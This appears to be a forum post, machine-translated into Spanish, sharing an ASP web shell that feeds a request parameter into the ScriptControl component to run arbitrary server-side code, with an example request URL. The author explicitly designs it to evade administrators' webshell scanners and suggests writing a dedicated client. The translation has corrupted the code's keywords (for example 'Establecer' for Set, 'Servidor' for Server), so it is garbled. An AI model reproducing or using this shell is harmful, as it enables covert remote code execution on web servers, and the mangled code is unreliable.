Siempre he tenido curiosidad, ¿por qué hay evaluación o ejecución en el cliente? No importa dónde me esconda, el administrador puede patearme el trasero usando cualquier escáner webshell XX. Hoy volví a investigar el componente ScriptControl en VB y descubrí que también se puede llamar en ASP. Estudié el método y luego lo discutí con lcx. Obtuve el siguiente código. Me gustaría agradecer a mis mayores por su orientación, jaja.
El código es muy sencillo, así que no lo explicaré mucho para evitar que alguien me regañe por fingir.
Copie el código de código de la siguiente manera:
<%
Establecer o = Server.CreateObject(ScriptControl)
o.idioma = vbscript
o.addcode(Request(SubCode)) 'SubCódigo de parámetro como código de proceso
o.run e,Servidor,Respuesta,Solicitud,Aplicación,Sesión,Error 'Llámalo con el nombre del parámetro e y envía 6 objetos base como parámetros al mismo tiempo
'Ejemplo de llamada:
'http://localhost/tmp.asp?SubCode=sub%20e%28Servidor,Respuesta,Solicitud,Aplicación,Sesión,Error%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response .write%28server.mappath%28%22tmp.asp%22%29%29
%>
Tenga en cuenta que, aunque se puede utilizar, el experimento encontró que solo se puede utilizar el cliente lake2. Espero que alguien pueda salir y hacerlo más general. jeje. También sería una buena idea escribir su propio cliente dedicado.